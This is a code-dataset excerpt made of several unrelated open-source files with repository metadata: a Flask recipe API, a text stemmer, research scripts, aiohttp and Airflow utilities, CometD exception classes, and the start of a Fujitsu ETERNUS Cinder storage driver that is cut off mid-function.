"ingredient": i.ingredients.to_dict(),
"measurement": i.measurements.to_dict()}
for i in editted_recipe_query.recipe_ingredients
],
"steps":
[s.to_dict() for s in editted_recipe_query.recipe_steps]
}
editted_recipe = {
editted_recipe_expanded["id"]: editted_recipe_expanded}
return editted_recipe
recipe = Recipe(
user_id=form.user_id.data,
name=form.name.data,
content=form.content.data
)
db.session.add(recipe)
db.session.commit()
for ingredient in form.ingredients.entries:
recipe_ingredient = RecipeIngredient(
recipe_id=recipe.id,
ingredient_id=ingredient.ingredient_id.data,
measurement_id=ingredient.measurement_id.data,
quantity=ingredient.quantity.data
)
db.session.add(recipe_ingredient)
for step in form.steps.entries:
step = RecipeStep(
recipe_id=recipe.id,
step_number=step.step_number.data,
content=step.content.data
)
db.session.add(step)
db.session.commit()
new_recipe_query = Recipe.query.options(selectinload(
Recipe.recipe_ingredients), selectinload(Recipe.recipe_steps)).get(recipe.id)
new_recipe = {**new_recipe_query.to_dict(),
"ingredients": [
{**i.to_dict(),
"ingredient": i.ingredients.to_dict(),
"measurement": i.measurements.to_dict()}
for i in new_recipe_query.recipe_ingredients
],
"steps": [s.to_dict() for s in new_recipe_query.recipe_steps]
}
new_recipe_by_id = {new_recipe["id"]: new_recipe}
return new_recipe_by_id
return {'errors': ['Internal Server Error']}, 500
@recipe_routes.route("/<int:id>", methods=["DELETE"])
def delete_recipe(id):
recipe_ingredients_to_delete = RecipeIngredient.query.filter_by(
recipe_id=id).all()
recipe_steps_to_delete = RecipeStep.query.filter_by(
recipe_id=id).all()
recipe_to_delete = Recipe.query.get_or_404(id)
for ri in recipe_ingredients_to_delete:
db.session.delete(ri)
for rs in recipe_steps_to_delete:
db.session.delete(rs)
db.session.delete(recipe_to_delete)
db.session.commit()
return {"success": True}
| 31.720588
| 89
| 0.585845
|
4a021fe2a484633fe2cfe8d9ed27170762c3c767
| 2,623
|
py
|
Python
|
glearn/crf/stemmed.py
|
WeiShiwei/tornado_glearn
|
5e74bbaaee4d2b8c5abf3b60cffbe54694a3bc6f
|
[
"Apache-2.0"
] | null | null | null |
glearn/crf/stemmed.py
|
WeiShiwei/tornado_glearn
|
5e74bbaaee4d2b8c5abf3b60cffbe54694a3bc6f
|
[
"Apache-2.0"
] | null | null | null |
glearn/crf/stemmed.py
|
WeiShiwei/tornado_glearn
|
5e74bbaaee4d2b8c5abf3b60cffbe54694a3bc6f
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import sys
import collections
from time import time
from datetime import datetime
sys.path.append( os.path.join( os.path.abspath(os.path.dirname(__file__)) , '../../dependence'))
# from trie import Trie
# RIGHT_SYMBOL = '@'
from distutils.util import get_platform
sys.path.insert(0, "ahocorasick-0.9/build/lib.%s-%s" % (get_platform(), sys.version[0:3]))
import ahocorasick
import ahocorasick.graphviz
sys.path.append( os.path.join( os.path.abspath(os.path.dirname(__file__)) , '../..'))
from glearn.sqlite import orm
reload(sys) #
sys.setdefaultencoding('utf-8') #
class Stemmed(object):
"""docstring for Stemmed"""
def __init__(self):
super(Stemmed, self).__init__()
self.tree = ahocorasick.KeywordTree()
self.word_stem_dict = collections.defaultdict(str)
self.__load_crf_stemmed()
self.stemmed_updatedTime = datetime(2000, 8, 6, 6, 29, 51, 144126)
def __load_crf_stemmed(self):
print('\n'+'=' * 80)
print("Ahocorasick KeywordTree Making: ")
print(self.tree)
t0 = time()
self.tree = ahocorasick.KeywordTree()
self.word_stem_dict = orm.CrfStemmed.get_word_stem_dict()
all_key_words = self.word_stem_dict.keys()
for word in all_key_words:
self.tree.add(word)
self.tree.make()
def stemming(self, doc):
""" 广义的词干化 """
# CrfStemmed_updatedTime = orm.CrfStemmed.fetch_latest_updated_time()
# if CrfStemmed_updatedTime != self.stemmed_updatedTime:
# self.__load_crf_stemmed()
# self.stemmed_updatedTime = CrfStemmed_updatedTime
doc_res = ''
if isinstance(doc, unicode):
doc = doc.encode('utf-8')
left_margin = 0
for match in self.tree.findall(doc):
beg,end = int(match[0]),int(match[1])
word = unicode(doc[beg:end].strip())
stem = self.word_stem_dict[word]
doc_res += doc[left_margin:beg]+stem
left_margin = end
doc_res += doc[left_margin:]
return doc_res
# def stemming_docs(self, docs):
# """ 广义的词干化 """
# CrfStemmed_updatedTime = orm.CrfStemmed.fetch_latest_updated_time()
# if CrfStemmed_updatedTime != self.stemmed_updatedTime:
# self.__load_crf_stemmed()
# self.stemmed_updatedTime = CrfStemmed_updatedTime
# docs = [self.stemming(docs[i]) for i in xrange(len(docs))]
# return docs
def main():
t0 = time()
stem = Stemmed()
print("Stemmed Instantiated done in %fs" % (time() - t0))
doc = u'螺纹钢<ZJM>φ14mm</ZJM> <PH>HRB400</PH>' # 'utf-8'
doc_res = stem.stemming(doc)# "螺纹钢Φ12mm"
print doc_res
doc = u'3×120+1' # 'utf-8'
doc_res = stem.stemming(doc)# "螺纹钢Φ12mm"
print doc_res
if __name__ == "__main__":
main()
| 27.322917
| 96
| 0.693481
|
4a0220b9e920197af0cb4a90b5c4983898f5736c
| 618
|
py
|
Python
|
experiments/test_trafficAssignment.py
|
salomonw/mixed-traffic-amod-route-rebalance
|
7f1edeb195a7bfab835e596ad84deead2957943e
|
[
"MIT"
] | 1
|
2022-03-07T16:15:56.000Z
|
2022-03-07T16:15:56.000Z
|
experiments/test_trafficAssignment.py
|
salomonw/mixed-traffic-amod-route-rebalance
|
7f1edeb195a7bfab835e596ad84deead2957943e
|
[
"MIT"
] | null | null | null |
experiments/test_trafficAssignment.py
|
salomonw/mixed-traffic-amod-route-rebalance
|
7f1edeb195a7bfab835e596ad84deead2957943e
|
[
"MIT"
] | null | null | null |
import src.tnet as tnet
import src.CARS as cars
netFile, gFile, fcoeffs = tnet.get_network_parameters('Braess1')
tNet = tnet.tNet(netFile=netFile, gFile=gFile, fcoeffs=fcoeffs)
tNet.solveMSA()
print([(i,j, tNet.G[i][j]['flow']) for i,j in tNet.G.edges()])
tNet.build_supergraph()
tNet = cars.solve_CARS_noRebalancing(tNet, exogenous_G=0, fcoeffs=fcoeffs, xa=1)
print([(i,j, tNet.G_supergraph[i][j]['flow']) for i,j in tNet.G.edges()])
exogObj = tnet.get_totalTravelTime(tNet.G, fcoeffs)
amodObjNoRebalancing = cars.get_totalTravelTime(tNet)
priceOfAnarchy = exogObj / amodObjNoRebalancing
print(priceOfAnarchy)
| 29.428571
| 80
| 0.755663
|
4a022140425bf99bbbc8d131968824bbdce4c1b5
| 3,524
|
py
|
Python
|
qecc/analyzer.py
|
huitaoshen/stabilizer-qecc-simulator
|
a4a551a588bd70a6978b8b136d7fade26eaaff7d
|
[
"MIT"
] | 11
|
2019-05-07T23:04:19.000Z
|
2021-12-15T05:44:54.000Z
|
qecc/analyzer.py
|
huitaoshen/stabilizer-qecc-simulator
|
a4a551a588bd70a6978b8b136d7fade26eaaff7d
|
[
"MIT"
] | null | null | null |
qecc/analyzer.py
|
huitaoshen/stabilizer-qecc-simulator
|
a4a551a588bd70a6978b8b136d7fade26eaaff7d
|
[
"MIT"
] | null | null | null |
from qecc.StabilizerCode import StabilizerCode
from typing import Callable
import numpy as np
import csv
def generate_training_data(file_name: str, n: int, code: StabilizerCode, error_correction_method: str,
error_model: Callable, *args, **kwds):
"""
Generate [syndrome history, logical error] as training data for a stabilizer code given error model.
Args:
file_name: The file name where the histories are saved as a csv file.
n: Number of different histories to be generated.
code: The stabilizer code based on which the history is to be generated.
error_correction_method: The logical error is only well-defined for physical errors with no syndromes. This is
the method name of code that is used to first eliminated the last syndrome.
error_model: The callable that generates the error history.
*args, **kwds: Positional or keyword arguments that are passed to the error model.
"""
last_phys_err = np.zeros([2 * code.n, 1], dtype=np.int)
with open(file_name, 'w') as file:
csv_writer = csv.writer(file)
for i in range(n):
phys_error_his = error_model(*args, **kwds)
last_phys_err[:] = np.reshape(phys_error_his[:, -1], [-1, 1])
last_phys_err += code.__getattribute__(error_correction_method)(code.phys_err_to_syndrome(last_phys_err))
csv_writer.writerows([np.transpose(code.phys_err_to_syndrome(phys_error_his)).flatten().tolist()
+ [code.phys_err_to_logic_err(last_phys_err)]])
def last_syndrome_analyze_table(file_name: str, num: int, code: StabilizerCode):
"""
Given syndrome history read from a file, count and generate last syndrome ~ logical error table of size
2 ** (n - k) x 4 ** k.
Args:
file_name: The file name where the histories are to be imported.
num: Last num syndromes to analyze. Defaults to 1.
code: The stabilizer code based on which the history is to be generated.
"""
def logic_err_str_to_idx(logic: str):
idx, multiplier = 0, 0
for i in range(len(logic)):
if logic[i] == 'I':
multiplier = 0
elif logic[i] == 'X':
multiplier = 1
elif logic[i] == 'Z':
multiplier = 2
elif logic[i] == 'Y':
multiplier = 3
idx += multiplier * (4 ** i)
return idx
n_syndrome = code.n - code.k
result = np.zeros([2 ** (num * n_syndrome), 4 ** code.k], dtype=np.int)
binary = np.transpose(2 ** np.arange(num * n_syndrome)[::-1])
# infer history length
with open(file_name, 'r') as file:
csv_reader = csv.reader(file, delimiter=',')
line = csv_reader.__next__()
l = (len(line) - 1) // (code.n - code.k)
syndromes = np.loadtxt(file_name, dtype=np.int, usecols=(x for x in range((l - num) * n_syndrome,
l * n_syndrome)), delimiter=",")
logical_err = np.loadtxt(file_name, dtype=np.str, usecols=l * n_syndrome, delimiter=",")
for i in range(np.shape(syndromes)[0]):
result[np.dot(syndromes[i], binary), logic_err_str_to_idx(logical_err[i])] += 1
n = np.sum(result)
naive = np.sum(result, axis=0)[0] / n
best = np.sum(np.amax(result, axis=1)) / n
print("Naive correction: {:4}%. Upper bound: {:4}%".format(100.0 * naive, 100.0 * best))
| 45.766234
| 118
| 0.61067
|
4a0221dd6fc2ff0a67e0ec758dbbe1faaf6fd7ce
| 1,352
|
py
|
Python
|
demos/paired_mrus_prostate/demo_train.py
|
mathpluscode/DeepReg
|
80854094feafec998fa6237199066556c73f31f9
|
[
"Apache-2.0"
] | null | null | null |
demos/paired_mrus_prostate/demo_train.py
|
mathpluscode/DeepReg
|
80854094feafec998fa6237199066556c73f31f9
|
[
"Apache-2.0"
] | null | null | null |
demos/paired_mrus_prostate/demo_train.py
|
mathpluscode/DeepReg
|
80854094feafec998fa6237199066556c73f31f9
|
[
"Apache-2.0"
] | null | null | null |
import argparse
from datetime import datetime
from deepreg.train import train
name = "paired_mrus_prostate"
# parser is used to simplify testing
# please run the script with --no-test flag to ensure non-testing mode
# for instance:
# python script.py --no-test
parser = argparse.ArgumentParser()
parser.add_argument(
"--test",
help="Execute the script for test purpose",
dest="test",
action="store_true",
)
parser.add_argument(
"--no-test",
help="Execute the script for non-test purpose",
dest="test",
action="store_false",
)
parser.set_defaults(test=True)
args = parser.parse_args()
print(
"\n\n\n\n\n"
"=======================================================\n"
"The training can also be launched using the following command.\n"
"deepreg_train --gpu '0' "
f"--config_path demos/{name}/{name}.yaml "
f"--log_root demos/{name} "
"--log_dir logs_train\n"
"=======================================================\n"
"\n\n\n\n\n"
)
log_root = f"demos/{name}"
log_dir = "logs_train/" + datetime.now().strftime("%Y%m%d-%H%M%S")
config_path = [f"demos/{name}/{name}.yaml"]
if args.test:
config_path.append("config/test/demo_paired.yaml")
train(
gpu="0",
config_path=config_path,
gpu_allow_growth=True,
ckpt_path="",
log_root=log_root,
log_dir=log_dir,
)
| 24.142857
| 70
| 0.612426
|
4a02227ec4d2343a4df6594c6d113412177ebb77
| 3,124
|
py
|
Python
|
aiocometd/exceptions.py
|
robertmrk/aiocometd
|
6c69ba505d02df334ebc551695d05c0427b92daf
|
[
"MIT"
] | 14
|
2018-12-02T17:15:59.000Z
|
2022-02-27T12:37:50.000Z
|
aiocometd/exceptions.py
|
robertmrk/aiocometd
|
6c69ba505d02df334ebc551695d05c0427b92daf
|
[
"MIT"
] | 14
|
2019-02-11T13:06:59.000Z
|
2022-02-14T18:04:16.000Z
|
aiocometd/exceptions.py
|
robertmrk/aiocometd
|
6c69ba505d02df334ebc551695d05c0427b92daf
|
[
"MIT"
] | 16
|
2019-03-11T13:13:29.000Z
|
2022-02-27T11:30:59.000Z
|
"""Exception types
Exception hierarchy::
AiocometdException
ClientError
ClientInvalidOperation
TransportError
TransportInvalidOperation
TransportTimeoutError
TransportConnectionClosed
ServerError
"""
from typing import Optional, List, cast
from aiocometd import utils
class AiocometdException(Exception):
"""Base exception type.
All exceptions of the package inherit from this class.
"""
class TransportError(AiocometdException):
"""Error during the transportation of messages"""
class TransportInvalidOperation(TransportError):
"""The requested operation can't be executed on the current state of the
transport"""
class TransportTimeoutError(TransportError):
"""Transport timeout"""
class TransportConnectionClosed(TransportError):
"""The connection unexpectedly closed"""
class ServerError(AiocometdException):
"""CometD server side error"""
# pylint: disable=useless-super-delegation
def __init__(self, message: str, response: Optional[utils.JsonObject]) \
-> None:
"""If the *response* contains an error field it gets parsed
according to the \
`specs <https://docs.cometd.org/current/reference/#_code_error_code>`_
:param message: Error description
:param response: Server response message
"""
super().__init__(message, response)
# pylint: enable=useless-super-delegation
@property
def message(self) -> str:
"""Error description"""
# pylint: disable=unsubscriptable-object
return cast(str, self.args[0])
# pylint: enable=unsubscriptable-object
@property
def response(self) -> Optional[utils.JsonObject]:
"""Server response message"""
return cast(Optional[utils.JsonObject],
self.args[1]) # pylint: disable=unsubscriptable-object
@property
def error(self) -> Optional[str]:
"""Error field in the :obj:`response`"""
if self.response is None:
return None
return self.response.get("error")
@property
def error_code(self) -> Optional[int]:
"""Error code part of the error code part of the `error\
<https://docs.cometd.org/current/reference/#_code_error_code>`_, \
message field"""
return utils.get_error_code(self.error)
@property
def error_message(self) -> Optional[str]:
"""Description part of the `error\
<https://docs.cometd.org/current/reference/#_code_error_code>`_, \
message field"""
return utils.get_error_message(self.error)
@property
def error_args(self) -> Optional[List[str]]:
"""Arguments part of the `error\
<https://docs.cometd.org/current/reference/#_code_error_code>`_, \
message field"""
return utils.get_error_args(self.error)
class ClientError(AiocometdException):
"""ComtedD client side error"""
class ClientInvalidOperation(ClientError):
"""The requested operation can't be executed on the current state of the
client"""
| 28.925926
| 78
| 0.664213
|
4a0222ac1b2bf5f61c0a48df0567bd73108325b1
| 1,744
|
py
|
Python
|
demos/1d_fit_analysis.py
|
Suhwan-Dev/kalmaNN
|
5ac85076a9b544ddb6dbe00cbf0bbf0727aca81e
|
[
"MIT"
] | null | null | null |
demos/1d_fit_analysis.py
|
Suhwan-Dev/kalmaNN
|
5ac85076a9b544ddb6dbe00cbf0bbf0727aca81e
|
[
"MIT"
] | null | null | null |
demos/1d_fit_analysis.py
|
Suhwan-Dev/kalmaNN
|
5ac85076a9b544ddb6dbe00cbf0bbf0727aca81e
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""
Use the 1D data interpolation/extrapolation problem to benchmark convergence
variance. Comparison of training methods, EKF vs SGD.
"""
# Dependencies
from __future__ import division
import numpy as np;
npl = np.linalg
import matplotlib.pyplot as plt
import kalmann
# Get some noisy training data, a fun compact function
stdev = 0.05
U = np.arange(-10, 10, 0.2)
Y = np.exp(-U ** 2) + 0.5 * np.exp(-(U - 3) ** 2) + np.random.normal(0, stdev, len(U))
# Repeat fitting experiment many times
nepochs_ekf = 100;
nepochs_sgd = 400
ekf_results = [];
sgd_results = []
for i in xrange(50):
# Create two identical KNN's that will be trained differently
knn_ekf = kalmann.KNN(nu=1, ny=1, nl=10, neuron='logistic')
knn_sgd = kalmann.KNN(nu=1, ny=1, nl=10, neuron='logistic')
# Train
RMS_ekf, trcov = knn_ekf.train(nepochs=nepochs_ekf, U=U, Y=Y, method='ekf', P=0.5, Q=0, R=stdev ** 2, pulse_T=-1)
RMS_sgd, _ = knn_sgd.train(nepochs=nepochs_sgd, U=U, Y=Y, method='sgd', step=0.05, pulse_T=-1)
# Store results
ekf_results.append(RMS_ekf[-1])
sgd_results.append(RMS_sgd[-1])
# Evaluation
fig = plt.figure()
xlim = [0.33, 0.36]
fig.suptitle("Histogram of Final RMS Errors", fontsize=22)
ax = fig.add_subplot(2, 1, 1)
ax.hist(ekf_results, 20, normed=1)
ax.set_xlim(xlim)
ax.set_ylabel("Using EKF", fontsize=18)
ax.grid(True)
ax = fig.add_subplot(2, 1, 2)
ax.hist(sgd_results, 20, normed=1)
ax.set_xlim(xlim)
ax.set_ylabel("Using SGD", fontsize=18)
ax.set_xlabel("RMS", fontsize=18)
ax.grid(True)
fig2 = plt.figure()
ax = fig2.add_subplot(1, 1, 1)
ax.set_title("Trace of Covariance During Training", fontsize=22)
ax.plot(trcov)
ax.set_xlabel("Iteration", fontsize=16)
ax.grid(True)
plt.show()
| 28.590164
| 117
| 0.699541
|
4a0223357cbd3de9d7e70c061602f0df6a64c9f9
| 746
|
py
|
Python
|
aiohttp_tools/middlewares.py
|
imbolc/aiohttp_tools
|
b57cc286f7a89affeee8ee3f65197362f05d043d
|
[
"0BSD"
] | 1
|
2017-05-24T14:34:54.000Z
|
2017-05-24T14:34:54.000Z
|
aiohttp_tools/middlewares.py
|
imbolc/aiohttp_tools
|
b57cc286f7a89affeee8ee3f65197362f05d043d
|
[
"0BSD"
] | null | null | null |
aiohttp_tools/middlewares.py
|
imbolc/aiohttp_tools
|
b57cc286f7a89affeee8ee3f65197362f05d043d
|
[
"0BSD"
] | null | null | null |
import logging
from aiohttp import web
log = logging.getLogger(__name__)
def fix_host(true_host: str):
@web.middleware
async def fix_host_middleware(request, handler):
if request.host != true_host:
requested_url = "{}://{}{}".format(
request.scheme, request.host, request.path_qs
)
redirect_url = "{}://{}{}".format(
request.scheme, true_host, request.path_qs
)
log.warning(
"Unknown domain redirection: %s => %s",
requested_url,
redirect_url,
)
raise web.HTTPPermanentRedirect(redirect_url)
return await handler(request)
return fix_host_middleware
| 27.62963
| 61
| 0.565684
|
4a022387b288bf84885123705a7d1c5eb34b0528
| 729
|
py
|
Python
|
dags/utest/common/test_mysql.py
|
asdf-zxcv/airflow-dags
|
033511deaaf07a662b30d35fd86ae866115baa28
|
[
"Unlicense"
] | null | null | null |
dags/utest/common/test_mysql.py
|
asdf-zxcv/airflow-dags
|
033511deaaf07a662b30d35fd86ae866115baa28
|
[
"Unlicense"
] | null | null | null |
dags/utest/common/test_mysql.py
|
asdf-zxcv/airflow-dags
|
033511deaaf07a662b30d35fd86ae866115baa28
|
[
"Unlicense"
] | null | null | null |
import unittest
from unittest import mock
from airflow.hooks.base import BaseHook
from airflow.models import Connection, Variable
class Test(unittest.TestCase):
def test_env(self):
with mock.patch.dict("os.environ", AIRFLOW_VAR_KEY="env-value"):
assert "env-value" == Variable.get("key")
def test(self):
conn = Connection(
conn_type="gcpssh",
login="cat",
host="conn-host",
)
conn_uri = conn.get_uri()
with mock.patch.dict("os.environ", AIRFLOW_CONN_MY_CONN=conn_uri):
test_conn = BaseHook.get_connection(conn_id="my_conn")
assert "cat" == test_conn.login
if __name__ == '__main__':
unittest.main()
| 27
| 74
| 0.62963
|
4a02238e937b86800b5f5133cea62020d6575fcf
| 86,610
|
py
|
Python
|
cinder/volume/drivers/fujitsu/eternus_dx/eternus_dx_common.py
|
maydaycc/cinder
|
2da0a68ea478913b20ecd1bafe0bde42ea18d840
|
[
"Apache-2.0"
] | null | null | null |
cinder/volume/drivers/fujitsu/eternus_dx/eternus_dx_common.py
|
maydaycc/cinder
|
2da0a68ea478913b20ecd1bafe0bde42ea18d840
|
[
"Apache-2.0"
] | null | null | null |
cinder/volume/drivers/fujitsu/eternus_dx/eternus_dx_common.py
|
maydaycc/cinder
|
2da0a68ea478913b20ecd1bafe0bde42ea18d840
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2015 FUJITSU LIMITED
# Copyright (c) 2012 EMC Corporation.
# Copyright (c) 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
Cinder Volume driver for Fujitsu ETERNUS DX S3 series.
"""
import ast
import base64
import hashlib
import time
from defusedxml import ElementTree as ET
from oslo_concurrency import lockutils
from oslo_config import cfg
from oslo_log import log as logging
from oslo_service import loopingcall
from oslo_utils import units
import six
from cinder import exception
from cinder.i18n import _
from cinder import utils
from cinder.volume import configuration as conf
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
try:
import pywbem
pywbemAvailable = True
except ImportError:
pywbemAvailable = False
VOL_PREFIX = "FJosv_"
RAIDGROUP = 2
TPPOOL = 5
SNAPOPC = 4
OPC = 5
RETURN_TO_RESOURCEPOOL = 19
DETACH = 8
INITIALIZED = 2
UNSYNCHRONIZED = 3
BROKEN = 5
PREPARED = 11
REPL = "FUJITSU_ReplicationService"
STOR_CONF = "FUJITSU_StorageConfigurationService"
CTRL_CONF = "FUJITSU_ControllerConfigurationService"
STOR_HWID = "FUJITSU_StorageHardwareIDManagementService"
UNDEF_MSG = 'Undefined Error!!'
JOB_RETRIES = 60
JOB_INTERVAL_SEC = 10
# Error code keyword.
VOLUME_IS_BUSY = 32786
DEVICE_IS_BUSY = 32787
VOLUMENAME_IN_USE = 32788
COPYSESSION_NOT_EXIST = 32793
LUNAME_IN_USE = 4102
LUNAME_NOT_EXIST = 4097 # Only for InvokeMethod(HidePaths).
EC_REC = 3
FJ_ETERNUS_DX_OPT_opts = [
cfg.StrOpt('cinder_eternus_config_file',
default='/etc/cinder/cinder_fujitsu_eternus_dx.xml',
help='config file for cinder eternus_dx volume driver'),
]
POOL_TYPE_dic = {
RAIDGROUP: 'RAID_GROUP',
TPPOOL: 'Thinporvisioning_POOL',
}
OPERATION_dic = {
SNAPOPC: RETURN_TO_RESOURCEPOOL,
OPC: DETACH,
EC_REC: DETACH,
}
RETCODE_dic = {
'0': 'Success',
'1': 'Method Not Supported',
'4': 'Failed',
'5': 'Invalid Parameter',
'4096': 'Method Parameters Checked - Job Started',
'4097': 'Size Not Supported',
'4101': 'Target/initiator combination already exposed',
'4102': 'Requested logical unit number in use',
'32769': 'Maximum number of Logical Volume in a RAID group '
'has been reached',
'32770': 'Maximum number of Logical Volume in the storage device '
'has been reached',
'32771': 'Maximum number of registered Host WWN '
'has been reached',
'32772': 'Maximum number of affinity group has been reached',
'32773': 'Maximum number of host affinity has been reached',
'32785': 'The RAID group is in busy state',
'32786': 'The Logical Volume is in busy state',
'32787': 'The device is in busy state',
'32788': 'Element Name is in use',
'32792': 'No Copy License',
'32793': 'Session is not exist',
'32796': 'Quick Format Error',
'32801': 'The CA port is in invalid setting',
'32802': 'The Logical Volume is Mainframe volume',
'32803': 'The RAID group is not operative',
'32804': 'The Logical Volume is not operative',
'32808': 'No Thin Provisioning License',
'32809': 'The Logical Element is ODX volume',
'32811': 'This operation cannot be performed to the NAS resources',
'32812': 'This operation cannot be performed to the Storage Cluster '
'resources',
'32816': 'Fatal error generic',
'35302': 'Invalid LogicalElement',
'35304': 'LogicalElement state error',
'35316': 'Multi-hop error',
'35318': 'Maximum number of multi-hop has been reached',
'35324': 'RAID is broken',
'35331': 'Maximum number of session has been reached(per device)',
'35333': 'Maximum number of session has been reached(per SourceElement)',
'35334': 'Maximum number of session has been reached(per TargetElement)',
'35335': 'Maximum number of Snapshot generation has been reached '
'(per SourceElement)',
'35346': 'Copy table size is not setup',
'35347': 'Copy table size is not enough',
}
CONF.register_opts(FJ_ETERNUS_DX_OPT_opts, group=conf.SHARED_CONF_GROUP)
class FJDXCommon(object):
"""Common code that does not depend on protocol."""
VERSION = "1.3.0"
stats = {
'driver_version': VERSION,
'free_capacity_gb': 0,
'reserved_percentage': 0,
'storage_protocol': None,
'total_capacity_gb': 0,
'vendor_name': 'FUJITSU',
'QoS_support': False,
'volume_backend_name': None,
}
def __init__(self, prtcl, configuration=None):
self.pywbemAvailable = pywbemAvailable
self.protocol = prtcl
self.configuration = configuration
self.configuration.append_config_values(FJ_ETERNUS_DX_OPT_opts)
if prtcl == 'iSCSI':
# Get iSCSI ipaddress from driver configuration file.
self.configuration.iscsi_ip_address = (
self._get_drvcfg('EternusISCSIIP'))
@staticmethod
def get_driver_options():
return FJ_ETERNUS_DX_OPT_opts
def create_volume(self, volume):
"""Create volume on ETERNUS."""
LOG.debug('create_volume, '
'volume id: %(vid)s, volume size: %(vsize)s.',
{'vid': volume['id'], 'vsize': volume['size']})
self.conn = self._get_eternus_connection()
volumesize = int(volume['size']) * units.Gi
volumename = self._create_volume_name(volume['id'])
LOG.debug('create_volume, volumename: %(volumename)s, '
'volumesize: %(volumesize)u.',
{'volumename': volumename,
'volumesize': volumesize})
# get poolname from driver configuration file
eternus_pool = self._get_drvcfg('EternusPool')
# Existence check the pool
pool = self._find_pool(eternus_pool)
if 'RSP' in pool['InstanceID']:
pooltype = RAIDGROUP
else:
pooltype = TPPOOL
configservice = self._find_eternus_service(STOR_CONF)
if configservice is None:
msg = (_('create_volume, volume: %(volume)s, '
'volumename: %(volumename)s, '
'eternus_pool: %(eternus_pool)s, '
'Storage Configuration Service not found.')
% {'volume': volume,
'volumename': volumename,
'eternus_pool': eternus_pool})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
LOG.debug('create_volume, '
'CreateOrModifyElementFromStoragePool, '
'ConfigService: %(service)s, '
'ElementName: %(volumename)s, '
'InPool: %(eternus_pool)s, '
'ElementType: %(pooltype)u, '
'Size: %(volumesize)u.',
{'service': configservice,
'volumename': volumename,
'eternus_pool': eternus_pool,
'pooltype': pooltype,
'volumesize': volumesize})
# Invoke method for create volume
rc, errordesc, job = self._exec_eternus_service(
'CreateOrModifyElementFromStoragePool',
configservice,
ElementName=volumename,
InPool=pool,
ElementType=self._pywbem_uint(pooltype, '16'),
Size=self._pywbem_uint(volumesize, '64'))
if rc == VOLUMENAME_IN_USE: # Element Name is in use
LOG.warning('create_volume, '
'volumename: %(volumename)s, '
'Element Name is in use.',
{'volumename': volumename})
vol_instance = self._find_lun(volume)
element = vol_instance
elif rc != 0:
msg = (_('create_volume, '
'volumename: %(volumename)s, '
'poolname: %(eternus_pool)s, '
'Return code: %(rc)lu, '
'Error: %(errordesc)s.')
% {'volumename': volumename,
'eternus_pool': eternus_pool,
'rc': rc,
'errordesc': errordesc})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
else:
element = job['TheElement']
# Get eternus model name
try:
systemnamelist = (
self._enum_eternus_instances('FUJITSU_StorageProduct'))
except Exception:
msg = (_('create_volume, '
'volume: %(volume)s, '
'EnumerateInstances, '
'cannot connect to ETERNUS.')
% {'volume': volume})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
LOG.debug('create_volume, '
'volumename: %(volumename)s, '
'Return code: %(rc)lu, '
'Error: %(errordesc)s, '
'Backend: %(backend)s, '
'Pool Name: %(eternus_pool)s, '
'Pool Type: %(pooltype)s.',
{'volumename': volumename,
'rc': rc,
'errordesc': errordesc,
'backend': systemnamelist[0]['IdentifyingNumber'],
'eternus_pool': eternus_pool,
'pooltype': POOL_TYPE_dic[pooltype]})
# Create return value.
element_path = {
'classname': element.classname,
'keybindings': {
'CreationClassName': element['CreationClassName'],
'SystemName': element['SystemName'],
'DeviceID': element['DeviceID'],
'SystemCreationClassName': element['SystemCreationClassName']
}
}
volume_no = "0x" + element['DeviceID'][24:28]
metadata = {'FJ_Backend': systemnamelist[0]['IdentifyingNumber'],
'FJ_Volume_Name': volumename,
'FJ_Volume_No': volume_no,
'FJ_Pool_Name': eternus_pool,
'FJ_Pool_Type': POOL_TYPE_dic[pooltype]}
return (element_path, metadata)
def create_volume_from_snapshot(self, volume, snapshot):
"""Creates a volume from a snapshot."""
LOG.debug('create_volume_from_snapshot, '
'volume id: %(vid)s, volume size: %(vsize)s, '
'snapshot id: %(sid)s.',
{'vid': volume['id'], 'vsize': volume['size'],
'sid': snapshot['id']})
self.conn = self._get_eternus_connection()
source_volume_instance = self._find_lun(snapshot)
# Check the existence of source volume.
if source_volume_instance is None:
msg = _('create_volume_from_snapshot, '
'Source Volume does not exist in ETERNUS.')
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
# Create volume for the target volume.
(element_path, metadata) = self.create_volume(volume)
target_volume_instancename = self._create_eternus_instance_name(
element_path['classname'], element_path['keybindings'])
try:
target_volume_instance = (
self._get_eternus_instance(target_volume_instancename))
except Exception:
msg = (_('create_volume_from_snapshot, '
'target volume instancename: %(volume_instancename)s, '
'Get Instance Failed.')
% {'volume_instancename': target_volume_instancename})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
self._create_local_cloned_volume(target_volume_instance,
source_volume_instance)
return (element_path, metadata)
def create_cloned_volume(self, volume, src_vref):
"""Create clone of the specified volume."""
LOG.debug('create_cloned_volume, '
'tgt: (%(tid)s, %(tsize)s), src: (%(sid)s, %(ssize)s).',
{'tid': volume['id'], 'tsize': volume['size'],
'sid': src_vref['id'], 'ssize': src_vref['size']})
self.conn = self._get_eternus_connection()
source_volume_instance = self._find_lun(src_vref)
if source_volume_instance is None:
msg = _('create_cloned_volume, '
'Source Volume does not exist in ETERNUS.')
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
(element_path, metadata) = self.create_volume(volume)
target_volume_instancename = self._create_eternus_instance_name(
element_path['classname'], element_path['keybindings'])
try:
target_volume_instance = (
self._get_eternus_instance(target_volume_instancename))
except Exception:
msg = (_('create_cloned_volume, '
'target volume instancename: %(volume_instancename)s, '
'Get Instance Failed.')
% {'volume_instancename': target_volume_instancename})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
self._create_local_cloned_volume(target_volume_instance,
